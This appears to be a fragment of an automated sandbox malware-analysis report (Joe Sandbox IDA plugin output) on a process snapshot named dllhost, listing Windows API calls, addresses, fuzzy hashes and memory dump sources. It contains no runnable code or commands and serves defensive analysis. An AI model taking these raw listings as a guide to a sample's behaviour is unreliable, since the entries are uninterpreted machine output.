                                                                                  • API String ID: 2020098873-0
                                                                                  • Opcode ID: d49466e2b71193a36731df746ec1887938efd12bcb208c3441ac4186523aebc5
                                                                                  • Instruction ID: 97a5c9557e1ae8d9f6599d7a94307f1eaeaa4b81106fa305304cd28b9b093828
                                                                                  • Opcode Fuzzy Hash: d49466e2b71193a36731df746ec1887938efd12bcb208c3441ac4186523aebc5
                                                                                  • Instruction Fuzzy Hash: 2EF06D36A016216BD7312F71BC09A5B3E78AF51B66B10053AF586B62E2CB389D418698
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401373
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401389
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00405455,?,?,?,00000000,00000001), ref: 004013BC
                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401424
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00405455,?), ref: 00401449
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID: UT@
                                                                                  • API String ID: 352835431-1027468425
                                                                                  • Opcode ID: c994583962df0ed7ae7243b69efa640dd53768e2b06385abeedffc49915dc18a
                                                                                  • Instruction ID: d78f3124ed4a51485e43371b09153d829d5b461428cb016d3bcab1a8dfffb7e2
                                                                                  • Opcode Fuzzy Hash: c994583962df0ed7ae7243b69efa640dd53768e2b06385abeedffc49915dc18a
                                                                                  • Instruction Fuzzy Hash: A9112832900249EBDF228F94CD00ADEBBB5FB48350F148166FE11722B0D3368D60DB64
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(0046302C), ref: 0040542A
                                                                                  • InterlockedDecrement.KERNEL32(0046302C), ref: 0040543F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement
                                                                                  • String ID: ,0F
                                                                                  • API String ID: 2172605799-2398074048
                                                                                  • Opcode ID: d0039b60ddb3736004e8f66d235de526adf7d0c1eeb433830ddcdd98a6567be0
                                                                                  • Instruction ID: 9f011c1cc064125e4e1f365d8986e9f9c51d6544cad74443aba1903841879af2
                                                                                  • Opcode Fuzzy Hash: d0039b60ddb3736004e8f66d235de526adf7d0c1eeb433830ddcdd98a6567be0
                                                                                  • Instruction Fuzzy Hash: 1DF0A972105A11ABE720AE65A881B8B6794EB80317F25443FF200A51E2C7B89D81CA6E
                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,Qe@,00000000,Qe@,00000000,00000000,00000000,?,00406551,00000000), ref: 00407B07
                                                                                  • GetLastError.KERNEL32(?,00406551,00000000), ref: 00407B38
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CompletionErrorLastQueuedStatus
                                                                                  • String ID: Qe@$Qe@
                                                                                  • API String ID: 1532515109-880564545
                                                                                  • Opcode ID: 30c82a72444b98b0c31a9aadcc92cde5706fef6031e42e068d93ad7527ca1d74
                                                                                  • Instruction ID: d58a1868424a8a0235f50982a74f1edf5cd213767c1dac622a4f6683b2030a8b
                                                                                  • Opcode Fuzzy Hash: 30c82a72444b98b0c31a9aadcc92cde5706fef6031e42e068d93ad7527ca1d74
                                                                                  • Instruction Fuzzy Hash: D7011DB5504205AFC714CF11D884AA737F8EF08369B10067EA40AD72A1EB74FD81CB99
                                                                                  APIs
                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,0045D430,0045D430,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000), ref: 00402AB1
                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000), ref: 00402AD5
                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000), ref: 00402AEF
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000,?), ref: 00402BB0
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,004027D4,00000000,00000010,00000000,00000009,00000009,?,00401DA4,00000010,00000000,?,00000000), ref: 00402BC7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmp
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 714016831-0
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046F7
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 00404DC4
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $
                                                                                  • API String ID: 1807457897-3032137957
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00405455,?), ref: 0040157B
                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,UT@,?,?,?,?,?,?,00405455,?), ref: 0040158D
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiStringTypeWide
                                                                                  • String ID: UT@
                                                                                  • API String ID: 3139900361-1027468425
                                                                                  APIs
                                                                                  • HeapReAlloc.KERNEL32(00000000,?,00000000,00000000,00402D2D,00000000,00000000,00000000,00401D46,00000000,00000000,?,00000000,00000000,00000000), ref: 0040308C
                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00402D2D,00000000,00000000,00000000,00401D46,00000000,00000000,?,00000000,00000000,00000000), ref: 004030C0
                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004030DA
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004030F1
                                                                                  Similarity
                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3499195154-0
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404019
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404021
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404029
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404031
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection
                                                                                  • String ID:
                                                                                  • API String ID: 32694325-0